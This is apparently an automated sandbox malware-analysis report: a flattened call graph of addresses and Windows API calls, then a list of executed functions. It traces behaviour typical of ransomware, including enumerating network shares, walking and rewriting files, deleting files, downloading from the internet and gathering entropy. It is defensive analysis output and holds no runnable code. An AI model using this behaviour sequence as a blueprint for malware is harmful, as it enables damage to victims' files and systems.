40440->40442 40453 e60bbf 58 API calls _free 40442->40453 40444 e53a03 40445 e5816b __flsbuf 58 API calls 40444->40445 40446 e53a09 40445->40446 40454 e60a4a 63 API calls 6 library calls 40446->40454 40448 e53a0f 40448->40438 40449 e50bed _free 58 API calls 40448->40449 40449->40438 40450->40217 40451->40217 40452->40438 40453->40444 40454->40448 40456 e45ab8 40455->40456 40457 e459e8 40455->40457 40535 e7f26c 59 API calls 3 library calls 40456->40535 40458 e45ac2 40457->40458 40459 e45a02 40457->40459 40536 e7f23e 59 API calls 2 library calls 40458->40536 40462 e45acc 40459->40462 40463 e45a1a 40459->40463 40466 e45a2a ___init_ctype 40459->40466 40537 e7f23e 59 API calls 2 library calls 40462->40537 40463->40466 40534 e46950 59 API calls 2 library calls 40463->40534 40466->39608 40483 e43ff0 59 API calls 40482->40483 40484 e3cbed 40483->40484 40485 e456d0 59 API calls 40484->40485 40486 e3cc12 40485->40486 40487 e456d0 59 API calls 40486->40487 40488 e3cc37 40487->40488 40538 e3f250 40488->40538 40490 e456d0 59 API calls 40492 e3cca6 40490->40492 40491 e3cc4a 40491->40490 40493 e456d0 59 API calls 40492->40493 40494 e3cccb 40493->40494 40495 e3f250 59 API calls 40494->40495 40497 e3ccde 40495->40497 40496 e456d0 59 API calls 40498 e3cd3a 40496->40498 40497->40496 40499 e456d0 59 API calls 40498->40499 40500 e3cd5f 40499->40500 40501 e3f250 59 API calls 40500->40501 40502 e3cd72 40501->40502 40543 e81d30 40502->40543 40504 e3cdae 40546 e7f960 40504->40546 40506 e3cdbc 40554 e824a0 40506->40554 40508 e3cdd3 40561 e82ed0 40508->40561 40512 e3cdeb 40513 e3ce06 40512->40513 40514 e3cdef 40512->40514 40516 e50c62 _malloc 58 API calls 40513->40516 40567 e80670 104 API calls __except_handler4 40514->40567 40517 e3ce17 40516->40517 40518 e50c62 _malloc 58 API calls 40517->40518 40519 e3ce26 40518->40519 40521 e3ce52 40519->40521 40522 e3ce81 40519->40522 40520 e3cdfc 40520->39675 40568 e81fb0 100 API calls __except_handler4 40521->40568 40571 e7f5e0 100 API calls __except_handler4 40522->40571 40525 e3ce87 40572 e81a60 101 API calls __except_handler4 40525->40572 40526 e3ce57 40528 e80960 101 API calls 40526->40528 40529 e3ce5d 40528->40529 40569 e80670 104 API calls __except_handler4 40529->40569 40531 e3ce63 __flsbuf 40570 e52408 85 API calls 8 library calls 40531->40570 40534->40466 40535->40458 40541 e3f260 40538->40541 40539 e3f2a0 40539->40491 40541->40539 40573 e42e80 59 API calls _memmove 40541->40573 40574 e44160 59 API calls 2 library calls 40541->40574 40575 e81d40 40543->40575 40545 e81d37 40545->40504 40547 e7f96f __except_handler4 40546->40547 40548 e7f991 40547->40548 40549 e7f978 40547->40549 40614 e7fc40 100 API calls __except_handler4 40548->40614 40613 e812d0 101 API calls __except_handler4 40549->40613 40552 e7f98a 40552->40506 40553 e7f99b __except_handler4 40553->40506 40555 e824a9 40554->40555 40556 e824c2 40554->40556 40615 e812d0 101 API calls __except_handler4 40555->40615 40558 e7f960 __except_handler4 101 API calls 40556->40558 40560 e824e3 40558->40560 40559 e824bb 40559->40508 40560->40508 40616 e928e0 40561->40616 40563 e3cde3 40564 e80960 40563->40564 40624 e80c30 101 API calls 3 library calls 40564->40624 40566 e80967 __except_handler4 40566->40512 40567->40520 40568->40526 40569->40531 40570->40520 40571->40525 40572->40520 40573->40541 40574->40541 40576 e81d52 __except_handler4 40575->40576 40577 e81d5b 40576->40577 40578 e81d77 40576->40578 40606 e812d0 101 API calls __except_handler4 40577->40606 40580 e81dcb 40578->40580 40581 e81d96 40578->40581 40609 e8a4d0 101 API calls __except_handler4 40580->40609 40607 e8a6c0 101 API calls __except_handler4 40581->40607 40582 e81d70 40582->40545 40585 e81d9c 40586 e81da3 40585->40586 40589 e81dc6 40585->40589 40608 e812d0 101 API calls __except_handler4 40586->40608 40588 e81e15 40612 e83d50 100 API calls __except_handler4 40588->40612 40589->40588 40593 e81dea 40589->40593 40590 e81db8 __except_handler4 40590->40545 40610 e812d0 101 API calls __except_handler4 40593->40610 40597 e81dff 40611 e8a5e0 101 API calls __except_handler4 40597->40611 40600 e81e07 __except_handler4 40600->40545 40606->40582 40607->40585 40608->40590 40609->40589 40610->40597 40611->40600 40613->40552 40614->40553 40615->40559 40617 e928ea __write_nolock 40616->40617 40622 e92e50 109 API calls 3 library calls 40617->40622 40619 e9291b 40621 e92922 __except_handler4 40619->40621 40623 e812d0 101 API calls __except_handler4 40619->40623 40621->40563 40622->40619 40623->40621 40624->40566 40628 e4c001 40627->40628 40637 e4c00a 40627->40637 40629 e4c083 40628->40629 40630 e4c04c 40628->40630 40628->40637 40632 e4c09e 40629->40632 40635 e4c0e1 40629->40635 40639 e4cf30 59 API calls 40630->40639 40640 e4cf30 59 API calls 40632->40640 40642 e4c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 40635->40642 40636 e4c0b2 40636->40637 40641 e4d5b0 59 API calls 40636->40641 40637->39719 40639->40637 40640->40636 40641->40637 40642->40636 40686 e53f74 40643->40686 40646 e4f196 Sleep 40647 e4f1c1 40646->40647 40648 e4f94b 40646->40648 40649 e40a50 65 API calls 40647->40649 40650 e44690 59 API calls 40648->40650 40655 e4f1cd 40649->40655 40651 e4f97a 40650->40651 40746 e40160 89 API calls 5 library calls 40651->40746 40653 e45c10 59 API calls 40654 e4f274 40653->40654 40689 e3f730 40654->40689 40659 e50235 _TranslateName 60 API calls 40655->40659 40662 e4f216 40655->40662 40657 e4f9c1 SendMessageW 40660 e4f9e1 40657->40660 40683 e4f8af 40657->40683 40658 e4f987 40658->40657 40661 e411c0 170 API calls 40658->40661 40663 e41ab0 PeekMessageW DispatchMessageW PeekMessageW 40658->40663 40659->40655 40660->40683 40661->40658 40662->40653 40663->40658 40664 e45c10 59 API calls 40666 e4f281 40664->40666 40665 e45c10 59 API calls 40667 e4f392 40665->40667 40666->40664 40666->40667 40670 e3f730 192 API calls 40666->40670 40667->40665 40671 e3f730 192 API calls 40667->40671 40674 e4f52c 40667->40674 40668 e4f5bd PeekMessageW 40668->40674 40669 e45c10 59 API calls 40675 e4f73e 40669->40675 40670->40666 40671->40667 40672 e4f689 40672->40669 40673 e44690 59 API calls 40673->40674 40674->40668 40674->40672 40674->40673 40676 e3f730 192 API calls 40674->40676 40678 e4f5d6 DispatchMessageW PeekMessageW 40674->40678 40677 e3f730 192 API calls 40675->40677 40676->40674 40685 e4f74b 40677->40685 40678->40674 40679 e4f893 SendMessageW 40679->40683 40680 e4f7cf PeekMessageW 40680->40685 40681 e44690 59 API calls 40681->40685 40682 e4f7e7 DispatchMessageW PeekMessageW 40682->40685 40684 e3f730 192 API calls 40684->40685 40685->40679 40685->40680 40685->40681 40685->40682 40685->40684 40687 e55007 _GetLcidFromLangCountry 58 API calls 40686->40687 40688 e4f16a Sleep 40687->40688 40688->40646 40688->40683 40690 e41ab0 3 API calls 40689->40690 40699 e3f765 40690->40699 40691 e3f8b5 40692 e44690 59 API calls 40691->40692 40693 e3f8ea PathFindFileNameW 40692->40693 40695 e3f923 40693->40695 40694 e44690 59 API calls 40694->40699 40695->40695 40696 e45c10 59 API calls 40695->40696 40697 e3f98c 40696->40697 40698 e43520 59 API calls 40697->40698 40717 e3f9a8 _memmove 40698->40717 40699->40691 40699->40694 40700 e45ae0 59 API calls 40699->40700 40701 e50235 _TranslateName 60 API calls 40699->40701 40716 e3f927 40699->40716 40700->40699 40701->40699 40702 e3fa44 PathFindFileNameW 40702->40717 40703 e3fb28 40704 e3fcdc 40703->40704 40705 e44690 59 API calls 40703->40705 40787 e47140 40704->40787 40708 e3fb55 40705->40708 40706 e45c10 59 API calls 40706->40717 40747 e3f310 LoadLibraryW 40708->40747 40711 e43520 59 API calls 40711->40717 40713 e3fb5a 40713->40704 40714 e44690 59 API calls 40713->40714 40715 e3fb75 40714->40715 40718 e43a90 59 API calls 40715->40718 40716->40666 40717->40702 40717->40703 40717->40706 40717->40711 40719 e3fb86 PathAppendW 40718->40719 40723 e48400 59 API calls 40719->40723 40720 e40052 FindNextFileW 40722 e4006b FindClose 40720->40722 40744 e3fd22 _wcsstr 40720->40744 40722->40716 40724 e3fbfe _memmove 40723->40724 40725 e3fc4f PathFileExistsW 40724->40725 40725->40704 40728 e3fc6d 40725->40728 40726 e47140 59 API calls 40726->40744 40727 e41ab0 3 API calls 40727->40744 40730 e50c62 _malloc 58 API calls 40728->40730 40729 e45ae0 59 API calls 40729->40744 40732 e3fc77 lstrcpyW 40730->40732 40731 e44690 59 API calls 40731->40744 40734 e3fca3 lstrcatW 40732->40734 40735 e3fca1 40732->40735 40736 e44690 59 API calls 40734->40736 40735->40734 40739 e3fccf 40736->40739 40780 e3f0e0 CreateFileW 40739->40780 40740 e3ff41 PathFindExtensionW 40740->40744 40742 e3fcd6 40743 e50bed _free 58 API calls 40742->40743 40743->40704 40744->40716 40744->40720 40744->40726 40744->40727 40744->40729 40744->40731 40745 e411c0 170 API calls 40744->40745 40795 e45ae0 40744->40795 40810 e43b70 59 API calls 40744->40810 40745->40744 40746->40658 40748 e3f34b GetProcAddress 40747->40748 40751 e3f344 40747->40751 40749 e43a90 59 API calls 40748->40749 40750 e3f368 40749->40750 40752 e48400 59 API calls 40750->40752 40751->40713 40753 e3f39d 40752->40753 40754 e45c10 59 API calls 40753->40754 40755 e3f3c4 40754->40755 40756 e45c10 59 API calls 40755->40756 40757 e3f3eb 40756->40757 40811 e3f2b0 59 API calls 40757->40811 40759 e45c10 59 API calls 40761 e3f45e 40759->40761 40760 e3f3fe 40760->40759 40762 e45c10 59 API calls 40761->40762 40763 e3f485 40762->40763 40812 e3f2b0 59 API calls 40763->40812 40765 e3f498 40766 e3f50a 40765->40766 40813 e48380 65 API calls __forcdecpt_l 40765->40813 40768 e3f542 40766->40768 40814 e48380 65 API calls __forcdecpt_l 40766->40814 40770 e3f560 FreeLibrary 40768->40770 40771 e3f56e 40768->40771 40773 e3f6c7 40770->40773 40772 e43520 59 API calls 40771->40772 40774 e3f57d 40772->40774 40773->40751 40776 e43520 59 API calls 40774->40776 40778 e3f5ed 40774->40778 40775 e3f6a5 FreeLibrary 40775->40773 40776->40778 40777 e43520 59 API calls 40779 e3f65d 40777->40779 40778->40775 40778->40777 40779->40775 40781 e3f1b4 40780->40781 40782 e3f136 40780->40782 40781->40742 40783 e45c10 59 API calls 40782->40783 40784 e3f178 40783->40784 40785 e42840 60 API calls 40784->40785 40786 e3f183 lstrlenA WriteFile CloseHandle 40785->40786 40786->40781 40788 e47197 40787->40788 40792 e471c8 40788->40792 40815 e45d50 59 API calls ___init_ctype 40788->40815 40789 e459d0 59 API calls 40790 e471ef 40789->40790 40793 e45ae0 59 API calls 40790->40793 40792->40789 40794 e3fd00 FindFirstFileW 40793->40794 40794->40744 40796 e45b36 40795->40796 40801 e45aee 40795->40801 40797 e45bf1 40796->40797 40798 e45b49 40796->40798 40817 e7f23e 59 API calls 2 library calls 40797->40817 40800 e45bfb 40798->40800 40802 e45b61 40798->40802 40807 e45b71 ___init_ctype 40798->40807 40818 e7f23e 59 API calls 2 library calls 40800->40818 40801->40796 40806 e45b15 40801->40806 40802->40807 40816 e46950 59 API calls 2 library calls 40802->40816 40808 e459d0 59 API calls 40806->40808 40807->40740 40809 e45b30 40808->40809 40809->40740 40810->40744 40811->40760 40812->40765 40813->40766 40814->40768 40815->40792 40816->40807 40822 e40bd0 WNetOpenEnumW 40819->40822 40821 e4fd95 SendMessageW 40823 e40c33 GlobalAlloc 40822->40823 40824 e40c1c 40822->40824 40828 e40c45 _memset 40823->40828 40824->40821 40825 e40c51 WNetEnumResourceW 40826 e40ea3 WNetCloseEnum 40825->40826 40825->40828 40826->40821 40827 e45c10 59 API calls 40827->40828 40828->40825 40828->40827 40829 e450c0 59 API calls 40828->40829 40830 e48fd0 59 API calls 40828->40830 40831 e40bd0 59 API calls 40828->40831 40829->40828 40830->40828 40831->40828 40832->39761 40833->39762 40834->39749 40835->39752 40838 e5f7c0 __write_nolock 40837->40838 40839 e4e6b6 timeGetTime 40838->40839 40840 e53f74 58 API calls 40839->40840 40841 e4e6cc 40840->40841 40907 e3c6a0 RegOpenKeyExW 40841->40907 40844 e4e72e InternetOpenW 40895 e4e6d4 _memset _strstr _wcsstr 40844->40895 40845 e4ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 40845->40895 40846 e4ea4c SHGetFolderPathA 40847 e4ea67 PathAppendA DeleteFileA 40846->40847 40846->40895 40847->40895 40849 e4eada lstrlenA 40849->40895 40850 e45ae0 59 API calls 40850->40895 40851 e456d0 59 API calls 40851->40895 40852 e44690 59 API calls 40883 e4e7be _memmove 40852->40883 40853 e4ee4d 40854 e3ef50 58 API calls 40853->40854 40859 e4ee5d 40854->40859 40855 e43ff0 59 API calls 40855->40895 40856 e42900 60 API calls 40856->40895 40858 e4eb53 lstrcpyW 40860 e4eb74 lstrlenA 40858->40860 40858->40895 40862 e43ea0 59 API calls 40859->40862 40865 e4eeb1 40859->40865 40863 e50c62 _malloc 58 API calls 40860->40863 40861 e459d0 59 API calls 40861->40895 40862->40859 40863->40895 40864 e4e8f3 lstrcpyW 40866 e4e943 InternetOpenUrlW InternetReadFile 40864->40866 40864->40895 40867 e3ef50 58 API calls 40865->40867 40869 e4e9ec InternetCloseHandle InternetCloseHandle 40866->40869 40870 e4e97c SHGetFolderPathA 40866->40870 40875 e4eec1 40867->40875 40868 e4eb99 MultiByteToWideChar lstrcpyW 40868->40895 40869->40883 40870->40869 40871 e4e996 PathAppendA 40870->40871 40939 e520b6 40871->40939 40872 e4e93c lstrcatW 40872->40866 40873 e4ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 40873->40895 40877 e43ea0 59 API calls 40875->40877 40882 e4ef12 40875->40882 40876 e4ebf0 SHGetFolderPathA 40878 e4ec17 PathAppendA DeleteFileA 40876->40878 40876->40895 40877->40875 40878->40895 40879 e4e9c4 lstrlenA 40942 e52b02 80 API calls 4 library calls 40879->40942 40881 e4ecaa lstrlenA 40881->40895 40884 e43ff0 59 API calls 40882->40884 40883->40852 40883->40869 40883->40872 40883->40879 40885 e53a38 __fcloseall 83 API calls 40883->40885 40883->40895 40938 e3dd40 73 API calls 4 library calls 40883->40938 40886 e4ef3a 40884->40886 40885->40883 40887 e42900 60 API calls 40886->40887 40889 e4ef45 lstrcpyW 40887->40889 40888 e4ed1f lstrcpyW 40890 e4ed43 lstrlenA 40888->40890 40888->40895 40893 e4ef6a 40889->40893 40892 e50c62 _malloc 58 API calls 40890->40892 40892->40895 40894 e43ff0 59 API calls 40893->40894 40896 e4ef9f 40894->40896 40895->40844 40895->40845 40895->40846 40895->40849 40895->40850 40895->40851 40895->40853 40895->40855 40895->40856 40895->40858 40895->40860 40895->40861 40895->40864 40895->40866 40895->40868 40895->40873 40895->40876 40895->40881 40895->40883 40895->40888 40895->40890 40898 e4ed68 MultiByteToWideChar lstrcpyW lstrlenW 40895->40898 40901 e4edc3 SHGetFolderPathA 40895->40901 40904 e50bed 58 API calls _free 40895->40904 40912 e3c500 SHGetFolderPathA 40895->40912 40932 e41b10 timeGetTime timeGetTime 40895->40932 40897 e42900 60 API calls 40896->40897 40899 e4efac lstrcpyW 40897->40899 40898->40895 40900 e4edad lstrlenW 40898->40900 40905 e4ee44 40899->40905 40900->40895 40900->40905 40901->40895 40903 e4edea PathAppendA DeleteFileA 40901->40903 40903->40895 40904->40895 40908 e3c734 40907->40908 40909 e3c6cc RegQueryValueExW 40907->40909 40908->40895 40910 e3c6fd RegCloseKey 40909->40910 40911 e3c70c RegSetValueExW RegCloseKey 40909->40911 40910->40895 40911->40908 40913 e3c525 40912->40913 40914 e3c52c PathAppendA 40912->40914 40913->40895 40915 e520b6 125 API calls 40914->40915 40916 e3c550 40915->40916 40917 e3c559 40916->40917 40943 e5387f 85 API calls 6 library calls 40916->40943 40917->40895 40919 e3c56c 40944 e53455 69 API calls 5 library calls 40919->40944 40921 e3c572 40945 e50cf4 84 API calls 6 library calls 40921->40945 40923 e3c57a 40924 e3c5a5 40923->40924 40926 e3c589 40923->40926 40925 e53a38 __fcloseall 83 API calls 40924->40925 40927 e3c5ab 40925->40927 40946 e522f5 74 API calls __fread_nolock 40926->40946 40927->40895 40929 e3c593 40930 e53a38 __fcloseall 83 API calls 40929->40930 40931 e3c599 40930->40931 40931->40895 40933 e41b7f 40932->40933 40934 e41b2f 40932->40934 40933->40895 40934->40933 40935 e41b40 PeekMessageW 40934->40935 40937 e41b58 DispatchMessageW PeekMessageW 40934->40937 40935->40934 40936 e41b70 Sleep timeGetTime 40935->40936 40936->40933 40936->40935 40937->40934 40937->40936 40938->40883 40947 e51ff2 40939->40947 40941 e520c6 40941->40883 40942->40883 40943->40919 40944->40921 40945->40923 40946->40929 40948 e51ffe _wprintf 40947->40948 40949 e52010 40948->40949 40951 e5203d 40948->40951 40950 e55208 __flsbuf 58 API calls 40949->40950 40952 e52015 40950->40952 40953 e58df4 __getstream 61 API calls 40951->40953 40966 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40952->40966 40955 e52042 40953->40955 40956 e52058 40955->40956 40957 e5204b 40955->40957 40959 e52081 40956->40959 40960 e52061 40956->40960 40958 e55208 __flsbuf 58 API calls 40957->40958 40961 e52020 _wprintf @_EH4_CallFilterFunc@8 40958->40961 40967 e5b078 40959->40967 40962 e55208 __flsbuf 58 API calls 40960->40962 40961->40941 40962->40961 40966->40961 40976 e5b095 40967->40976 40968 e5b0a9 40969 e55208 __flsbuf 58 API calls 40968->40969 40971 e5b0ae 40969->40971 40970 e5b250 40970->40968 40973 e5b2ac 40970->40973 40985 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40971->40985 40990 e6fba6 40973->40990 40974 e5208c 40984 e520ae LeaveCriticalSection LeaveCriticalSection _setvbuf 40974->40984 40976->40968 40976->40970 40986 e6fbc4 58 API calls __mbsnbcmp_l 40976->40986 40978 e5b216 40978->40968 40987 e6fcf3 65 API calls __mbsnbicmp_l 40978->40987 40980 e5b249 40980->40970 40988 e6fcf3 65 API calls __mbsnbicmp_l 40980->40988 40982 e5b268 40982->40970 40989 e6fcf3 65 API calls __mbsnbicmp_l 40982->40989 40984->40961 40985->40974 40986->40978 40987->40980 40988->40982 40989->40970 40993 e6fa8f 40990->40993 40992 e6fbbf 40992->40974 40996 e6fa9b _wprintf 40993->40996 40994 e6fab1 40995 e55208 __flsbuf 58 API calls 40994->40995 40997 e6fab6 40995->40997 40996->40994 40998 e6fae7 40996->40998 41004 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40997->41004 41005 e6fb58 40998->41005 41003 e6fac0 _wprintf 41003->40992 41004->41003 41013 e57970 41005->41013 41008 e6fb03 41012 e6fb2c LeaveCriticalSection __unlock_fhandle 41008->41012 41009 e6bac1 __wsopen_nolock 109 API calls 41010 e6fb92 41009->41010 41011 e50bed _free 58 API calls 41010->41011 41011->41008 41012->41003 41014 e57993 41013->41014 41015 e5797d 41013->41015 41014->41015 41017 e5799a ___crtIsPackagedApp 41014->41017 41016 e55208 __flsbuf 58 API calls 41015->41016 41018 e57982 41016->41018 41020 e579b0 MultiByteToWideChar 41017->41020 41021 e579a3 AreFileApisANSI 41017->41021 41034 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 41018->41034 41023 e579db 41020->41023 41024 e579ca GetLastError 41020->41024 41021->41020 41022 e579ad 41021->41022 41022->41020 41025 e58cde __malloc_crt 58 API calls 41023->41025 41035 e551e7 58 API calls 3 library calls 41024->41035 41027 e579e3 41025->41027 41028 e579ea MultiByteToWideChar 41027->41028 41033 e5798c 41027->41033 41029 e57a00 GetLastError 41028->41029 41028->41033 41036 e551e7 58 API calls 3 library calls 41029->41036 41031 e57a0c 41032 e50bed _free 58 API calls 41031->41032 41032->41033 41033->41008 41033->41009 41034->41033 41035->41033 41036->41031 41037 e4bae0 41038 e4bba0 41037->41038 41039 e4bb13 41037->41039 41040 e4bbad 41038->41040 41043 e4bf3d 41038->41043 41041 e4bb54 41039->41041 41042 e4bb15 41039->41042 41045 e4bbd7 41040->41045 41046 e4bbb0 DefWindowProcW 41040->41046 41044 e4bb70 41041->41044 41051 e4bb75 DefWindowProcW 41041->41051 41047 e4bb47 PostQuitMessage 41042->41047 41048 e4bb1c 41042->41048 41049 e4bf65 IsWindow 41043->41049 41050 e4bf9a DefWindowProcW 41043->41050 41052 e50c62 _malloc 58 API calls 41045->41052 41047->41044 41048->41044 41048->41046 41055 e4bb2e 41048->41055 41049->41044 41053 e4bf73 DestroyWindow 41049->41053 41054 e4bbe9 GetComputerNameW 41052->41054 41053->41044 41056 e43100 59 API calls 41054->41056 41055->41044 41058 e41cd0 92 API calls 41055->41058 41057 e4bc26 41056->41057 41076 e4ce80 59 API calls _memmove 41057->41076 41059 e4bb3f 41058->41059 41059->41049 41061 e50bed _free 58 API calls 41074 e4bcdc 41061->41074 41062 e4bc3a 41062->41061 41063 e4befb IsWindow 41064 e4bf11 41063->41064 41065 e4bf28 41063->41065 41064->41065 41066 e4bf1a DestroyWindow 41064->41066 41065->41044 41066->41065 41067 e4bef7 41067->41063 41067->41065 41068 e44690 59 API calls 41068->41074 41070 e4c330 59 API calls 41070->41074 41071 e4c240 59 API calls 41071->41074 41072 e4b8b0 59 API calls 41072->41074 41074->41063 41074->41067 41074->41068 41074->41070 41074->41071 41074->41072 41075 e4be8f CreateThread 41074->41075 41077 e3eff0 65 API calls 41074->41077 41078 e4ce80 59 API calls _memmove 41074->41078 41075->41074 41076->41062 41077->41074 41078->41074 41079 e84c30 41081 e50c62 58 API calls 41079->41081 41080 e84c3a 41081->41080 41082 eb1920 41083 e5f7c0 __write_nolock 41082->41083 41084 eb1943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41083->41084 41085 eb1a0b 41084->41085 41086 eb19e2 GetProcAddress GetProcAddress 41084->41086 41087 eb1aab 41085->41087 41090 eb1a1b NetStatisticsGet 41085->41090 41086->41085 41088 eb1acb 41087->41088 41089 eb1ac4 FreeLibrary 41087->41089 41091 eb1ad5 GetProcAddress GetProcAddress GetProcAddress 41088->41091 41118 eb1b0d __write_nolock 41088->41118 41089->41088 41092 eb1a69 NetStatisticsGet 41090->41092 41093 eb1a33 __write_nolock 41090->41093 41091->41118 41092->41087 41094 eb1a87 __write_nolock 41092->41094 41098 e8d550 101 API calls 41093->41098 41099 e8d550 101 API calls 41094->41099 41095 eb1bee 41096 eb1c1b 41095->41096 41097 eb1c14 FreeLibrary 41095->41097 41100 eb1c31 LoadLibraryA 41096->41100 41101 eb1c24 41096->41101 41097->41096 41102 eb1a5a 41098->41102 41099->41087 41104 eb1d4b 41100->41104 41105 eb1c4a GetProcAddress GetProcAddress GetProcAddress 41100->41105 41182 e849a0 13 API calls 4 library calls 41101->41182 41102->41092 41107 eb1d59 12 API calls 41104->41107 41108 eb223f 41104->41108 41115 eb1c84 __write_nolock 41105->41115 41124 eb1cac __write_nolock 41105->41124 41106 eb1c29 41106->41100 41106->41104 41110 eb1e5c 41107->41110 41111 eb2233 FreeLibrary 41107->41111 41170 eb2470 41108->41170 41110->41111 41131 eb1ed9 CreateToolhelp32Snapshot 41110->41131 41111->41108 41113 eb1d3f FreeLibrary 41113->41104 41114 eb225b __write_nolock 41116 e8d550 101 API calls 41114->41116 41117 e8d550 101 API calls 41115->41117 41120 eb2276 GetCurrentProcessId 41116->41120 41117->41124 41118->41095 41122 e8d550 101 API calls 41118->41122 41127 eb1b7c __write_nolock 41118->41127 41119 eb1d03 __write_nolock 41119->41113 41123 e8d550 101 API calls 41119->41123 41121 eb228f __write_nolock 41120->41121 41128 e8d550 101 API calls 41121->41128 41122->41127 41125 eb1d3c 41123->41125 41124->41119 41126 e8d550 101 API calls 41124->41126 41125->41113 41126->41119 41127->41095 41129 e8d550 101 API calls 41127->41129 41130 eb22aa 41128->41130 41129->41095 41132 e5a77e __cftog_l 6 API calls 41130->41132 41131->41111 41133 eb1ef0 41131->41133 41134 eb22ca 41132->41134 41135 eb1f03 GetTickCount 41133->41135 41136 eb1f15 Heap32ListFirst 41133->41136 41135->41136 41137 eb2081 41136->41137 41142 eb1f28 __write_nolock 41136->41142 41138 eb209d Process32First 41137->41138 41139 eb2095 GetTickCount 41137->41139 41140 eb210a 41138->41140 41147 eb20b4 __write_nolock 41138->41147 41139->41138 41141 eb2118 GetTickCount 41140->41141 41148 eb2120 __write_nolock 41140->41148 41141->41148 41142->41137 41150 eb204e Heap32ListNext 41142->41150 41151 eb2066 GetTickCount 41142->41151 41154 e8d550 101 API calls 41142->41154 41161 eb1ff1 GetTickCount 41142->41161 41164 e8d550 41142->41164 41144 eb1f56 Heap32First 41144->41142 41145 e8d550 101 API calls 41145->41147 41146 eb2196 41149 eb21a4 GetTickCount 41146->41149 41159 eb21ac __write_nolock 41146->41159 41147->41140 41147->41145 41155 eb20fb GetTickCount 41147->41155 41148->41146 41153 e8d550 101 API calls 41148->41153 41162 eb2187 GetTickCount 41148->41162 41149->41159 41150->41137 41150->41142 41151->41137 41151->41142 41152 eb2219 41157 eb2229 41152->41157 41158 eb222d CloseHandle 41152->41158 41153->41148 41156 eb1fd9 Heap32Next 41154->41156 41155->41140 41155->41147 41156->41142 41157->41111 41158->41111 41159->41152 41160 e8d550 101 API calls 41159->41160 41163 eb220a GetTickCount 41159->41163 41160->41159 41161->41142 41162->41146 41162->41148 41163->41152 41163->41159 41165 e8d559 41164->41165 41167 e8d57d __write_nolock 41164->41167 41183 e9b5d0 101 API calls __except_handler4 41165->41183 41167->41144 41168 e8d55f 41168->41167 41184 e8a5e0 101 API calls __except_handler4 41168->41184 41171 eb247a __write_nolock 41170->41171 41172 eb24c3 GetTickCount 41171->41172 41173 eb2483 QueryPerformanceCounter 41171->41173 41176 eb24d6 __write_nolock 41172->41176 41174 eb2492 41173->41174 41175 eb2499 __write_nolock 41173->41175 41174->41172 41178 e8d550 101 API calls 41175->41178 41177 e8d550 101 API calls 41176->41177 41179 eb24ea 41177->41179 41180 eb24b7 41178->41180 41181 eb2244 GlobalMemoryStatus 41179->41181 41180->41172 41180->41181 41181->41114 41182->41106 41183->41168 41184->41167 41185 e716eb 41186 e716f7 41185->41186 41187 e7170a 41185->41187 41188 e55208 __flsbuf 58 API calls 41186->41188 41190 e71751 41187->41190 41193 e7171c 41187->41193 41189 e716fc 41188->41189 41227 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 41189->41227 41192 e55208 __flsbuf 58 API calls 41190->41192 41194 e71756 41192->41194 41214 e71667 41193->41214 41228 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 41194->41228 41197 e71706 41198 e7172b _strlen 41198->41197 41218 e5c0fd 41198->41218 41201 e542fd __wsopen_nolock 8 API calls 41203 e71785 _wprintf _strnlen 41201->41203 41202 e717a4 41204 e55208 __flsbuf 58 API calls 41202->41204 41203->41202 41207 e717ce 41203->41207 41205 e717a9 41204->41205 41229 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 41205->41229 41208 e58af7 __lock 58 API calls 41207->41208 41209 e717d5 41208->41209 41210 e71667 __getenv_helper_nolock 65 API calls 41209->41210 41211 e717e0 41210->41211 41230 e717fd LeaveCriticalSection _doexit 41211->41230 41212 e717b4 _wprintf 41215 e7167e 41214->41215 41217 e7167a __getenv_helper_nolock _strlen 41214->41217 41215->41217 41231 e7900f 41215->41231 41217->41198 41219 e5c116 41218->41219 41220 e5c108 41218->41220 41221 e55208 __flsbuf 58 API calls 41219->41221 41220->41219 41224 e5c12c 41220->41224 41226 e5c11d 41221->41226 41223 e5c127 41223->41197 41223->41201 41224->41223 41225 e55208 __flsbuf 58 API calls 41224->41225 41225->41226 41242 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 41226->41242 41227->41197 41228->41197 41229->41212 41230->41212 41239 e79037 41231->41239 41232 e79022 WideCharToMultiByte 41233 e7908a 41232->41233 41232->41239 41233->41217 41234 e58c96 __calloc_crt 58 API calls 41234->41239 41235 e79048 WideCharToMultiByte 41236 e79090 41235->41236 41235->41239 41238 e50bed _free 58 API calls 41236->41238 41238->41233 41239->41232 41239->41233 41239->41234 41239->41235 41240 e50bed _free 58 API calls 41239->41240 41241 e7d0cb 65 API calls 11 library calls 41239->41241 41240->41239 41241->41239 41242->41223

                                                                                                                            Executed Functions

                                                                                                                            Function 00E49F90 Relevance: 169.6, APIs: 65, Strings: 31, Instructions: 1565COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E3CF10: _memset.LIBCMT ref: 00E3CF4A
                                                                                                                              • Part of subcall function 00E3CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E3CF5F
                                                                                                                              • Part of subcall function 00E3CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E49FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00E49FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00E49FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00E49FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,012F31B0,?), ref: 00E4A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 00E4A161
